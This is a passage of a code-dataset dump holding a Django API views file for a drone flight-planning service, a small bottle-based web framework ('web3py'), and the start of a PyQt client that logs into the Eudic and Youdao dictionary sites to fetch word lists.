\"error\": wm.error_message})\n elif type == 'telemetry':\n tm = models.TelemetryMetadata.objects.get(id=id)\n if tm is None:\n Response({\"error\": \"Not found\"}, status=404)\n return Response({\"success\": True, \"id\": id, \"type\": type, \"state\": tm.state, \"error\": tm.error_message})\n return Response({\"error\": \"Invalid inputs\"}, status=400)\n\n @detail_route(methods=[\"get\"])\n def waypoints(self, *args, **kwargs):\n fp = self.get_object()\n return Response(data=serializers.WaypointMetadataSerializer(\n instance=fp.waypoints,\n ).data)\n\n @detail_route(methods=['get', 'delete'], permission_classes=[IsOperatorOrReadOnly])\n def telemetry(self, request, *args, **kwargs):\n \"\"\"\n Endpoint to get or delete telemetry\n \"\"\"\n if request.method == 'DELETE':\n flightplan = self.get_object()\n if flightplan:\n tm = flightplan.telemetry\n flightplan.telemetry = None\n tm.delete()\n flightplan.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response({'error': 'Invalid flight plan'}, status=status.HTTP_400_BAD_REQUEST)\n elif request.method == 'GET':\n fp = self.get_object()\n if fp.telemetry:\n telemetry = self._get_telemetry(\n fp,\n fields=('latitude', 'longitude'),\n filter=Q(latitude__isnull=False) & Q(longitude__isnull=False)\n )\n return Response(data=telemetry)\n return Response([])\n\n def _parse_date(self, s, field_name):\n date = dateparse.parse_date(s)\n # parse_date returns None if the string is incorrectly formatted,\n # and raises a ValueError if it's an invalid date (2017-11-42).\n # We just always want a ValueError if something is wrong.\n if not date:\n raise ValueError(\"Invalid %s, expected format: yyyy-mm-dd.\" % field_name)\n return date\n\n @list_route(methods=[\"get\"], )\n def search_flights(self, request, *args, **kwargs):\n \"\"\"\n Search endpoint\n \"\"\"\n date_start = request.GET.get('date_start') or None\n date_end = request.GET.get('date_end') or None\n operator_id = request.GET.get('operator_id')\n query = models.FlightPlan.objects.filter(\n Q(state=models.FlightPlan.STATE_PLANNED) | Q(state=models.FlightPlan.STATE_COMPLETED),\n operator__is_test=False\n )\n\n if date_start and date_end:\n try:\n date_start = self._parse_date(date_start, \"departure date\")\n date_end = self._parse_date(date_end, \"arrival date\")\n except ValueError as e:\n return Response(status=400, data={\"message\": e.message})\n\n start_date = datetime.combine(date_start, time.min)\n end_date = datetime.combine(date_end, time.max)\n query = query.filter(\n Q(\n # the departure time is in the time window (between the dates)\n Q(planned_departure_time__gte=start_date,\n planned_departure_time__lte=end_date)\n |\n # the arrival time is in the time window (between the dates)\n Q(planned_arrival_time__gte=start_date,\n planned_arrival_time__lte=end_date)\n |\n # the departure is before the window and arrival is after (window is inside of flight dates)\n Q(planned_departure_time__lte=start_date,\n planned_arrival_time__gte=end_date)\n )\n )\n\n\n if operator_id:\n query = query.filter(operator_id=operator_id)\n\n query = query.order_by('-planned_departure_time')\n return Response(data={\"plans\": serializers.FlightPlanGetSerializer(query, many=True).data})\n\n @action(detail=True, methods=['get'], permission_classes=[IsOperator])\n def assessments(self, request, *args, **kwargs):\n \"\"\" Retrieve the latest approved assessment, and the latest round of assessments\n \"\"\"\n flightPlan = self.get_object()\n\n assessmentChoices = {}\n\n if 'get_eligible' in request.GET:\n assessmentChoices = assessment.get_eligible(flightPlan)\n elif 'eligible_assessments[]' in request.GET:\n try:\n for assessmentName in request.GET.getlist('eligible_assessments[]'):\n assessmentChoices[assessmentName] = assessment.get_by_name(assessmentName)\n except:\n pass\n\n assessmentInfo = []\n for assessmentName, info in assessmentChoices.items():\n # Get all most recent approved assessemnts\n authorizationAssessmentsQuery = (models\n .Assessment\n .objects\n .filter(name=assessmentName, flight_plan=flightPlan, state__in=models.Assessment.STATES_AUTHORIZE)\n .order_by('-approved_at', '-run_at')\n .values('id', 'state', 'created_at', 'run_at', 'submitted_at', 'approved_at', 'error')\n )\n\n authorizationAssessments = []\n if authorizationAssessmentsQuery.count() > 0:\n authorizationAssessments = authorizationAssessmentsQuery\n for index, authorizationAssessment in enumerate(authorizationAssessments):\n authorizationAssessments[index]['report'] = assessment.get_assessment(authorizationAssessment['id'])\n\n # Get last run assessment\n lastRunAssessmentQuery = (models\n .Assessment\n .objects\n .filter(name=assessmentName, flight_plan=flightPlan)\n .order_by('-run_at')\n .exclude(state__in=models.Assessment.STATES_AUTHORIZE)\n .values('id', 'state', 'created_at', 'run_at', 'submitted_at', 'approved_at', 'error')\n )\n\n lastRunAssessment = None\n if lastRunAssessmentQuery.count() > 0:\n lastRunAssessment = lastRunAssessmentQuery.first()\n lastRunAssessment['report'] = assessment.get_assessment(lastRunAssessment['id'])\n\n assessmentInfo.append({\n \"info\": info,\n \"authorizationAssessments\": authorizationAssessments,\n \"lastRunAssessment\": lastRunAssessment,\n })\n\n return Response(data={\"assessmentInfo\": assessmentInfo})\n\n\n\nrouter.register(r'plans', FlightPlans, base_name='plan')\n\n\nclass MissionTypes(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.MissionTypeSerializer\n queryset = models.MissionType.objects.all()\n\nrouter.register(r'mission_types', MissionTypes, 'mission_type')\n\n\nclass Operators(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.OperatorSerializer\n queryset = (models.Operator.objects\n .annotate(num_flights=Count('flightplan'))\n .filter(num_flights__gt=0, is_test=False, flightplan__state__in=[models.FlightPlan.STATE_COMPLETED, models.FlightPlan.STATE_PLANNED])\n .order_by(Lower('organization')))\n permission_classes = (IsOperatorOrReadOnly,)\n\nrouter.register(r'operators', Operators, 'operator')\n\n\nclass Manufacturers(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.ManufacturerSerializer\n queryset = (\n models.Manufacturer\n .objects\n .order_by(Case(When(id__exact=0, then=Value('00000')), default=Lower('name')))\n )\n\n\nrouter.register(r'manufacturers', Manufacturers, 'manufacturer')\n\n\nclass UserSignupView(generics.ListCreateAPIView):\n permission_classes = (AllowAny, )\n serializer_class = serializers.UserInfoSerializer\n queryset = models.Operator.objects.all()\n\n def create(self, request, *args, **kwargs):\n try:\n return super(UserSignupView, self).create(request, *args, **kwargs)\n except IntegrityError as e:\n content = {'error': \"error %s\" % str(e)}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserUpdateView(generics.RetrieveUpdateAPIView):\n permission_classes = (IsAuthenticated, )\n serializer_class = serializers.UserUpdateSerializer\n queryset = models.Operator.objects.all()\n def update(self, request, *args, **kwargs):\n # Only allow updates to the currently logged in user\n instance = models.Operator.objects.get(user_id=request.user.id)\n serializer = serializers.UserUpdateSerializer(\n instance=instance,\n data=request.data\n )\n serializer.is_valid(raise_exception=True)\n self.perform_update(serializer)\n return Response(data=serializer.data)\n\n\n@api_view(http_method_names=['GET', ])\ndef current_user_details(request):\n if request.auth:\n current_user = User.objects.get(username=request.user)\n operator = models.Operator.objects.get(user=current_user)\n user_details = {\n 'username': current_user.username,\n 'first_name': current_user.first_name,\n 'last_name': current_user.last_name,\n 'email': current_user.email,\n 'id': current_user.id,\n 'organization': operator.organization,\n 'mobile_number': operator.mobile_number,\n 'altitude_unit': operator.altitude_unit,\n }\n else:\n user_details = {'error': 'Unauthorized user - 403'}\n return Response(user_details)\n\nclass UpdatePassword(generics.UpdateAPIView):\n \"\"\"\n An endpoint for changing password.\n \"\"\"\n serializer_class = serializers.ChangePasswordSerializer\n model = get_user_model()\n permission_classes = (IsAuthenticated,)\n\n def get_object(self, queryset=None):\n obj = self.request.user\n return obj\n\n def update(self, request, *args, **kwargs):\n self.object = self.get_object()\n serializer = self.get_serializer(data=request.data)\n\n if serializer.is_valid():\n # Check old password\n if not self.object.check_password(serializer.data.get(\"old_password\")):\n return Response({\"old_password\": [\"Wrong password.\"]}, status=status.HTTP_400_BAD_REQUEST)\n # set_password also hashes the password that the user will get\n self.object.set_password(serializer.data.get(\"new_password\"))\n self.object.save()\n # make sure the user stays logged in\n update_session_auth_hash(request, self.object)\n return Response({'success': True}, status=status.HTTP_200_OK)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ResetPassword(generics.CreateAPIView):\n \"\"\"\n Endpoint to get username or email for password reset\n \"\"\"\n serializer_class = serializers.PasswordResetSerializer\n permission_classes = (AllowAny,)\n\n @staticmethod\n def validate_email_address(email):\n try:\n validate_email(email)\n return True\n except ValidationError:\n return False\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n\n\n if serializer.is_valid():\n data = serializer.data.get('email_or_username')\n else:\n return Response({'error': 'Invalid data'}, status=status.HTTP_400_BAD_REQUEST)\n\n if self.validate_email_address(data) is True:\n associated_users= get_user_model().objects.filter(Q(email=data) | Q(username=data))\n if associated_users.exists():\n for user in associated_users:\n c = {\n 'email': user.email,\n 'domain': request.META['HTTP_HOST'],\n 'site_name': settings.SITE_NAME,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)).decode('utf-8'),\n 'user': user,\n 'token': default_token_generator.make_token(user),\n 'protocol': 'http',\n 'reset_url': '/accounts/reset-password/new/',\n }\n subject_template_name='account/email/password_reset_key_subject.txt'\n email_template_name='account/password_reset_from_key.html'\n subject = loader.render_to_string(subject_template_name, c)\n # Email subject *must not* contain newlines\n subject = ''.join(subject.splitlines())\n email = loader.render_to_string(email_template_name, c)\n try:\n send_mail(subject, email, settings.DEFAULT_FROM_EMAIL, [user.email], fail_silently=False)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': 'Email sent'}, status=status.HTTP_200_OK)\n return Response({'error': 'Username does not exist'}, status=status.HTTP_400_BAD_REQUEST)\n else:\n '''\n If the input is an username, then the following code will lookup for users associated with that user.\n If found then an email will be sent to the user's address\n '''\n associated_users = get_user_model().objects.filter(username=data)\n if associated_users.exists():\n for user in associated_users:\n c = {\n 'email': user.email,\n 'domain': request.META['HTTP_HOST'],\n 'site_name': settings.SITE_NAME,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)).decode('utf-8'),\n 'user': user,\n 'token': default_token_generator.make_token(user),\n 'protocol': 'http',\n 'reset_url': '/accounts/reset-password/new/',\n }\n subject_template_name = 'account/email/password_reset_key_subject.txt'\n email_template_name = 'account/password_reset_from_key.html'\n subject = loader.render_to_string(subject_template_name, c)\n # Email subject *must not* contain newlines\n subject = ''.join(subject.splitlines())\n email = loader.render_to_string(email_template_name, c)\n try:\n send_mail(subject, email, settings.DEFAULT_FROM_EMAIL , [user.email], fail_silently=False)\n except Exception as e:\n return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)\n return Response({ 'success': 'Email sent' }, status=status.HTTP_200_OK)\n return Response({ 'error': 'Username does not exist'}, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ResetPasswordConfirm(generics.CreateAPIView):\n \"\"\"\n Endpoint to confirm password reset\n \"\"\"\n serializer_class = serializers.SetPasswordSerializer\n permission_classes = (AllowAny,)\n\n def create(self, request, *arg, **kwargs):\n UserModel = get_user_model()\n serializer = self.get_serializer(request.data)\n uidb64 = kwargs['uidb64']\n token = kwargs['token']\n\n # assert uidb64 is not None and token is not None # checked by URLconf\n try:\n uid = urlsafe_base64_decode(uidb64).decode('utf-8')\n user = UserModel._default_manager.get(pk=uid)\n except (TypeError, ValueError, OverflowError, UserModel.DoesNotExist):\n user = None\n\n if user is not None and default_token_generator.check_token(user, token):\n new_password = serializer.data['new_password2']\n copy = serializer.data['new_password1']\n if new_password == copy :\n user.set_password(new_password)\n user.save()\n return Response({'success': True}, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\nclass Waypoints(mixins.ListModelMixin, viewsets.GenericViewSet):\n serializer_class = serializers.WaypointSerializer\n permission_classes = (IsOperator,)\n\n def retrieve(self, request, *arg, **kwargs):\n wm = models.WaypointMetadata.objects.get(id=kwargs.get('pk'))\n if self.check_object_permissions(request, wm):\n return Response({'error': \"Unauthorized\"}, status=401)\n\n queryset = models.Waypoint.objects.filter(waypoint_metadata_id=kwargs.get('pk')).order_by('order')\n return Response(data={\n \"waypoints\": serializers.WaypointSerializer(queryset, many=True).data,\n })\n\nrouter.register(r'waypoints', Waypoints, 'waypoints')\n\nclass Assessments(mixins.RetrieveModelMixin,\n mixins.UpdateModelMixin,\n mixins.CreateModelMixin,\n viewsets.GenericViewSet):\n\n permission_classes = (IsOperatorForAssessment,)\n serializer_class = serializers.AssessmentSerializer\n queryset = models.Assessment.objects.all()\n\n def create(self, request, *args, **kwargs):\n \"\"\" Prepare to assess a flight plan\n \"\"\"\n try:\n flightPlanId = request.data['flight_plan_id']\n flightPlan = models.FlightPlan.objects.get(pk=flightPlanId)\n assessment_id = assessment.assess(request.data['short_name'], flightPlan)\n except:\n return Response({'error': \"Error assessing flight plan\"}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'assessment_id': assessment_id}, status=status.HTTP_201_CREATED)\n\n def partial_update(self, request, *args, **kwargs):\n \"\"\" Update state to states like submitting or canceling an authorizated, otherwise refresh\n \"\"\"\n state = request.data['state'] if 'state' in request.data else None\n obj = self.get_object()\n if state == models.Assessment.STATE_SUBMITTING:\n # Submit\n serializer = serializers.AssessmentCreateSerializer(instance=obj.flight_plan, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n try:\n assessment.set_assessment_state(obj, models.Assessment.STATE_SUBMITTING)\n except:\n return Response({'error': 'Error submitting'}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': True}, status=status.HTTP_205_RESET_CONTENT)\n\n elif state == models.Assessment.STATE_CANCEL_REQUEST:\n # Cancel\n try:\n assessment.set_assessment_state(obj, models.Assessment.STATE_CANCEL_REQUEST)\n except:\n return Response({'error': 'Error cancelling'}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'success': True}, status=status.HTTP_205_RESET_CONTENT)\n else:\n # Refresh the assessment's state\n try:\n assessment_id = assessment.assess(obj.name, obj.flight_plan)\n except:\n return Response({'error': \"Error assessing flight plan\"}, status=status.HTTP_400_BAD_REQUEST)\n return Response({'assessment_id': assessment_id}, status=status.HTTP_205_RESET_CONTENT)\n return Response({'error': 'Invalid request'}, status=status.HTTP_400_BAD_REQUEST)\n\nrouter.register(r'assessments', Assessments, 'assessments')\n\nclass FlightPlanExport(mixins.ListModelMixin, viewsets.GenericViewSet):\n \"\"\" List flights\n \"\"\"\n serializer_class = serializers.FlightPlanExportSerializer\n permission_classes = (IsExperimentalUser,)\n authentication_classes = (TokenAuthentication,)\n queryset = models.FlightPlan.objects.filter(\n ~Q(state=models.FlightPlan.STATE_DELETED),\n Q(waypoints__country__in=settings.EXPORT_API_COUNTRIES) |\n Q(telemetry__country__in=settings.EXPORT_API_COUNTRIES)\n )\n\nclass FlightPlanExportDetail(mixins.RetrieveModelMixin, viewsets.GenericViewSet):\n \"\"\" Flight detail\n \"\"\"\n serializer_class = serializers.FlightPlanExportDetailSerializer\n permission_classes = (IsExperimentalUser,)\n authentication_classes = (TokenAuthentication,)\n # queryset is further filtered by primary key in `get_object()`\n queryset = models.FlightPlan.objects.all()\n\nexternal_router.register('list', FlightPlanExport, base_name='experimental')\nexternal_router.register('flight', FlightPlanExportDetail, base_name='experimental')\n\n@api_view()\n@renderer_classes([SwaggerUIRenderer, OpenAPIRenderer])\n@permission_classes((AllowAny,))\ndef schema_view(request):\n generator = SchemaGenerator(title='log.flights API', patterns=external_router.urls, url='/api/experimental')\n return Response(generator.get_schema())\n","sub_path":"planner/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":37522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"544074042","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport argparse\nimport cgitb\nimport collections\nimport copy\nimport datetime\nimport functools\nimport importlib\nimport inspect\nimport json\nimport linecache\nimport logging\nimport numbers\nimport os\nimport platform\nimport pydoc\nimport re\nimport sys\nimport threading\nimport time\nimport traceback\nimport types\nimport uuid\n\ntry: \n import gunicorn\nexcept:\n gunicorn = None\ntry:\n import gevent; gevent.monkey.patch_all()\nexcept:\n gevent = None\n\nimport jwt # PyJWT\nimport bottle\nimport yatl\nimport pydal\nfrom pydal import Field, _compat\n\n__all__ = ['render', 'DAL', 'Field', 'action', 'request', 'response', 'redirect', 'HTTP', 'Session']\n\nTEMPLATE_500 = \"\"\"\"\"\"\n\nrender = yatl.render\nrequest = bottle.request\nresponse = bottle.response\nredirect = bottle.redirect \n\nclass HTTP(Exception):\n def __init__(self, status, body):\n self.status = status\n self.body = body\n\n########################################################################################\n# a O(1) LRU cache and memoize with expiration and monitoring (using linked list)\n#########################################################################################\n\nclass Node(object):\n\n def __init__(self, key=None, value=None, t=None, m=None, prev=None, next=None):\n self.key, self.value, self.t, self.m, self.prev, self.next = key, value, t, m, prev, next\n\nclass Cache(object):\n \"\"\"\n O(1) caching object that remembers the 'size' most recent values\n Example:\n\n cache = Cache(size=1000)\n h = cache.get(filename, lambda: hash(open(filename).read()), 60, lambda: os.path.getmtime())\n \n (computes and cashes the hash of file filename but only reads the file if mtime changes and\n does not check the mtime more oftern than every 60. caches the 1000 most recent hashes)\n \"\"\"\n\n def __init__(self, size=1000):\n self.free = size\n self.head = Node()\n self.tail = Node()\n self.head.next = self.tail\n self.tail.prev = self.head\n self.mapping = {}\n\n def get(self, key, callback, expiration=3600, monitor=None):\n \"\"\"if not key stored or expired and monitor == None or monitor() value changed, returns value = callback()\"\"\"\n node, t0 = self.mapping.get(key), time.time()\n if node:\n value, t, node.next.prev, node.prev.next = node.value, node.t, node.prev, node.next\n if not node:\n self.free -= 1\n m = monitor and monitor()\n if node and node.t + expiration < t0:\n m = monitor and monitor()\n if m is None or node.m != m:\n node = None\n if node is None:\n value, t = callback(), t0\n new_node = Node(key, value, t, m, prev=self.head, next=self.head.next)\n self.mapping[key] = self.head.next = new_node.next.prev = new_node\n if self.free < 0:\n last_node = self.tail.prev\n self.tail.prev, last_node.prev.next = last_node.prev, self.tail\n del self.mapping[last_node.key]\n self.free += 1\n return value\n\n def memoize(self, expiration=3600):\n def decorator(func):\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = '%s:%s:%s:%s' % (func.__module__, func.__name__, args, kwargs)\n return self.get(key, lambda args=args, kwargs=kwargs: func(*args, **kwargs), expiration=expiration)\n return memoized_func\n return decorator\n\n#########################################################################################\n# a better json serializer\n#########################################################################################\n\ndef objectify(obj):\n \"\"\"converts the obj(ect) into a json serializable object\"\"\"\n if isinstance(obj, numbers.Integral):\n return int(obj)\n elif isinstance(obj, (numbers.Rational, numbers.Real)):\n return float(obj)\n elif isinstance(obj, (datetime.date, datetime.datetime, datetime.time)):\n return obj.isoformat()\n elif hasattr(obj, 'to_list') and callable(obj.to_list):\n return item.to_list()\n elif hasattr(obj, '__iter__') or isinstance(obj, types.GeneratorType):\n return list(obj)\n elif hasattr(obj, 'to_dict') and callable(obj.to_dict):\n return obj.to_dict()\n elif hasattr(obj, '__dict__') and hasattr(obj,'__class__'):\n d = copy.copy(obj.__dict__)\n d['__class__'] = obj.__class__.__name__\n return d\n else:\n return str(obj)\n\ndef dumps(obj):\n return json.dumps(obj, default=objectify, sort_keys=True, indent=2)\n\n#########################################################################################\n# Generic Fixture\n#########################################################################################\n\nclass Fixture(object):\n def on_request(self): pass\n def on_error(self): pass\n def on_success(self): pass\n\nclass DAL(pydal.DAL, Fixture):\n def on_request(self): self._adapter.reconnect()\n def on_error(self): self.rollback()\n def on_success(self): self.commit()\n\n#########################################################################################\n# Session logic (uses encrypted jwt token in cookies)\n#########################################################################################\n\nclass Session(Fixture):\n def __init__(self, secret, expiration=None, algorithm='HS256'):\n self.secret = secret\n self.expiration = expiration\n self.algorithm = algorithm \n self.local = threading.local()\n def load(self):\n self.local.session_cookie_name = '%s_session' % request.app_name\n enc_data = _compat.to_bytes(request.get_cookie(self.local.session_cookie_name))\n self.local.changed = False\n try:\n self.local.data = jwt.decode(enc_data, self.secret, algorithms=[self.algorithm])\n assert self.expiration is None or self.local.data['timestamp'] > time.time() - int(self.expiration)\n except Exception as e:\n self.local.data = {}\n if not 'uuid' in self.local.data:\n self.local.changed = True\n self.local.data['uuid'] = str(uuid.uuid4())\n def get(self, key, default=None):\n return self.local.data.get(key, default)\n def __getitem__(self, key):\n return self.local.data[key]\n def __setitem__(self, key, value):\n self.local.changed = True\n self.local.data[key] = value\n def save(self):\n self.local.data['timestamp'] = time.time() \n enc_data = jwt.encode(self.local.data, self.secret, algorithm = self.algorithm)\n response.set_cookie(self.local.session_cookie_name, _compat.to_native(enc_data))\n def on_request(self):\n self.load()\n def on_error(self):\n if self.local.changed:\n self.save()\n def on_success(self):\n if self.local.changed:\n self.save()\n\n#########################################################################################\n# the action decorator\n#########################################################################################\n\nclass action(object):\n \"\"\"@action(...) is a decorator for functions to be exposed as actions\"\"\"\n\n def __init__(self, path, **kwargs):\n self.path = path\n self.kwargs = kwargs\n self.view = kwargs.pop('view', None)\n self.fixtures = kwargs.pop('fixtures', [])\n\n def __call__(self, function):\n frame = inspect.stack()[1]\n module = inspect.getmodule(frame[0])\n folder = os.path.dirname(os.path.normpath(module.__file__))\n app_name = os.path.split(folder)[-1] ### FIX ME\n path = self.path.replace('/$app_name/', '/%s/' % app_name)\n @bottle.route(path, **self.kwargs)\n @functools.wraps(function)\n def wrapper(*func_args, **func_kwargs):\n try:\n request.app_name = app_name\n [obj.on_request() for obj in self.fixtures]\n output = function(*func_args, **func_kwargs)\n if isinstance(output, dict):\n view = self.view\n if view:\n path = os.path.join(folder, 'templates')\n with open(os.path.join(path, view)) as stream:\n context = dict(request=request)\n context.update(yatl.helpers.__dict__)\n context.update(output)\n output = yatl.render(stream.read(), path=path, context=context, delimiters='[[ ]]')\n else:\n output = dumps(output)\n [obj.on_success() for obj in self.fixtures]\n except HTTP as http:\n [obj.on_success() for obj in self.fixtures]\n raise bottle.HTTPResponse(status=http.status, body=http.body)\n except bottle.HTTPResponse as e:\n [obj.on_success() for obj in self.fixtures]\n raise e\n except:\n try: \n logging.error(traceback.format_exc())\n ticket = log_error(get_error_snapshot())\n [obj.on_error() for obj in self.fixtures] \n except:\n logging.error(traceback.format_exc())\n ticket = \"unknown\"\n output = TEMPLATE_500.format(ticket)\n return output \n return wrapper \n\n\n#########################################################################################\n# monkey patch ssl bug for gevent\n#########################################################################################\n\n__ssl__ = __import__('ssl')\n_ssl = getattr(__ssl__, '_ssl') or getattr(__ssl__, '_ssl2')\n\nif not hasattr(_ssl, 'sslwrap'):\n def new_sslwrap(sock, server_side=False, keyfile=None, certfile=None, \n cert_reqs=__ssl__.CERT_NONE, ssl_version=__ssl__.PROTOCOL_SSLv23, \n ca_certs=None, ciphers=None):\n context = __ssl__.SSLContext(ssl_version)\n context.verify_mode = cert_reqs or __ssl__.CERT_NONE\n if ca_certs:\n context.load_verify_locations(ca_certs)\n if certfile:\n context.load_cert_chain(certfile, keyfile)\n if ciphers:\n context.set_ciphers(ciphers)\n caller_self = inspect.currentframe().f_back.f_locals['self']\n return context._wrap_socket(sock, server_side=server_side, ssl_sock=caller_self)\n _ssl.sslwrap = new_sslwrap\n\n#########################################################################################\n# error handling\n#########################################################################################\n\ndef get_error_snapshot(depth=5):\n \"\"\"Return a dict describing a given traceback (based on cgitb.text).\"\"\"\n\n etype, evalue, etb = sys.exc_info()\n if isinstance(etype, type):\n etype = etype.__name__\n\n data = {}\n data['timestamp'] = datetime.datetime.utcnow().isoformat()\n data['python_version'] = sys.version\n platform_keys = [\n 'machine', 'node', 'platform', 'processor', 'python_branch', 'python_build',\n 'python_compiler', 'python_implementation', 'python_revision', 'python_version',\n 'python_version_tuple', 'release', 'system', 'uname', 'version']\n data['platform_info'] = {key: getattr(platform, key)() for key in platform_keys}\n data['os_environ'] = {\n key: pydoc.text.repr(value) for key, value in os.environ.items()}\n data['traceback'] = traceback.format_exc()\n data['exception_type'] = str(etype)\n data['exception_value'] = str(evalue)\n # loopover the stack frames\n items = inspect.getinnerframes(etb, depth)\n del etb # Prevent circular references that would cause memory leaks\n data['stackframes'] = stackframes = []\n for frame, file, lnum, func, lines, index in items:\n file = file and os.path.abspath(file) or '?'\n args, varargs, varkw, locals = inspect.getargvalues(frame)\n # basic frame information\n f = {'file': file, 'func': func, 'lnum': lnum}\n f['code'] = lines\n line_vars = cgitb.scanvars(lambda: linecache.getline(file, lnum), frame, locals)\n # dump local variables (referenced in current line only)\n f['vars'] = {key: pydoc.text.repr(value) for key, value in locals.items() if not key.startswith('__')}\n stackframes.append(f)\n\n return data\n\ndef log_error(error_snapshot):\n uri = os.environ['WEB3PY_SYSTEM_DB_URI']\n db = DAL(uri)\n db.define_table('web3py_error',\n Field('uuid'),\n Field('method'),\n Field('path','string'),\n Field('timestamp','datetime'),\n Field('client_ip','string'),\n Field('snapshot','json'))\n error_uuid = str(uuid.uuid4())\n db.web3py_error.insert(\n uuid=error_uuid,\n method=request.method,\n path=request.path,\n timestamp=datetime.datetime.utcnow(),\n client_ip=request.environ.get('REMOTE_ADDR'),\n snapshot=error_snapshot)\n return error_uuid\n\n#########################################################################################\n# loading/reloading logic\n#########################################################################################\n\nclass Reloader(object):\n \n ERRORS = {}\n\n def __init__(self, folder):\n self.folder = folder\n\n def import_apps(self):\n for app_name in os.listdir(self.folder):\n path = os.path.join(self.folder, app_name)\n if os.path.isdir(path) and not path.endswith('__'):\n try:\n importlib.import_module(path.replace(os.sep, '.'), self.folder)\n Reloader.ERRORS[app_name] = None\n except:\n print(traceback.format_exc())\n Reloader.ERRORS[app_name] = traceback.format_exc()\n @bottle.route('/%s/static/' % app_name)\n def server_static(filename, path=path):\n return bottle.static_file(filename, root=os.path.join(path, 'static'))\n\n#########################################################################################\n# find all routes\n#########################################################################################\n\ndef get_routes():\n app = bottle.default_app()\n routes = []\n for route in app.routes:\n func = route.callback\n routes.append({'rule': route.rule,\n 'method': route.method,\n 'filename': func.__module__, #.replace('.',os.sep) + '.py',\n 'action': func.__name__})\n return sorted(routes, key=lambda item: item['rule'])\n\n#########################################################################################\n# web server and reload logic\n#########################################################################################\n\ndef start_server(args):\n host, port = args.address.split(':')\n if args.workers < 1:\n bottle.run(host=host, port=int(port), reloader=True)\n else:\n if not gunicorn:\n logging.error('gunicorn not installed')\n elif not gunicorn:\n logging.error('gevent not installed')\n else:\n bottle.run(server='gunicorn', host=host, port=int(port),\n workers=args.workers, worker_class='gevent', reloader=True,\n certfile=args.certfile, keyfile=args.keyfile)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('folder', help='path to the applications folder')\n parser.add_argument('--address', default='127.0.0.1:8000',help='serving address')\n parser.add_argument('--workers', default=0, type=int, help='number of gunicorn workers')\n parser.add_argument('--certfile', default=None, type=int, help='ssl certificate file')\n parser.add_argument('--keyfile', default=None, type=int, help='ssl key file')\n parser.add_argument('--system_db_uri', default='sqlite:memory:', type=str, help='db uri for logging')\n action.args = args = parser.parse_args()\n args.folder = os.path.normpath(args.folder)\n os.environ['WEB3PY_APPLICATIONS'] = args.folder\n os.environ['WEB3PY_SYSTEM_DB_URI'] = args.system_db_uri\n sys.path.append(args.folder)\n reloader = Reloader(args.folder)\n reloader.import_apps()\n\n for item in get_routes():\n print(item)\n start_server(args)\n\nif __name__ == '__main__':\n main()\n","sub_path":"web3py.py","file_name":"web3py.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"436137135","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport time\nimport json\nimport hashlib\nimport cookielib\nimport urllib\nimport urllib2\nimport sqlite3\nimport pickle\nfrom HTMLParser import HTMLParser\nimport traceback\nfrom PyQt4 import QtCore\nclass Eudict(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n def login(self, username, password, rememberme):\n cj = cookielib.CookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n opener.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0')]\n urllib2.install_opener(opener)\n\n authentication_url = 'http://dict.eudic.net/Account/Login?returnUrl=https://my.eudic.net/studylist'\n payload = {\n 'UserName': username,\n 'Password': password,\n 'RememberMe': str(rememberme).lower(),\n 'returnUrl': 'https://my.eudic.net/studylist'\n }\n req = urllib2.Request(authentication_url, urllib.urlencode(payload))\n urllib2.urlopen(req)\n if 'EudicWeb' in str(cj):\n self.__saveCookies(cj)\n return True\n else:\n return False\n\n def __saveCookies(self, cookiejar):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n for c in cookiejar:\n args = dict(vars(c).items())\n args['rest'] = args['_rest']\n del args['_rest']\n c = cookielib.Cookie(**args)\n MozillaCookieJar.set_cookie(c)\n MozillaCookieJar.save('Eudict.cookie', ignore_discard=True)\n\n def __loadCookies(self):\n if os.path.exists('Eudict.cookie'):\n MozillaCookieJar = cookielib.MozillaCookieJar()\n MozillaCookieJar.load('Eudict.cookie', ignore_discard=True)\n return MozillaCookieJar\n else:\n return False\n\n def run(self):\n req = urllib2.Request(\"https://my.eudic.net/StudyList/WordsDataSource?length=100000000&categoryid=-1\")\n cookie = self.__loadCookies()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))\n urllib2.install_opener(opener)\n response = urllib2.urlopen(req).read()\n wordList = [term['uuid']for term in json.loads(response)['data']]\n self.emit(QtCore.SIGNAL('updateProgressBar_dict(int,int)'),int(1), int(1))\n self.results = wordList\n\nclass Youdao(QtCore.QThread):\n def __init__(self):\n QtCore.QThread.__init__(self)\n def login(self, username, password, rememberme):\n cj = cookielib.LWPCookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))\n opener.addheaders = 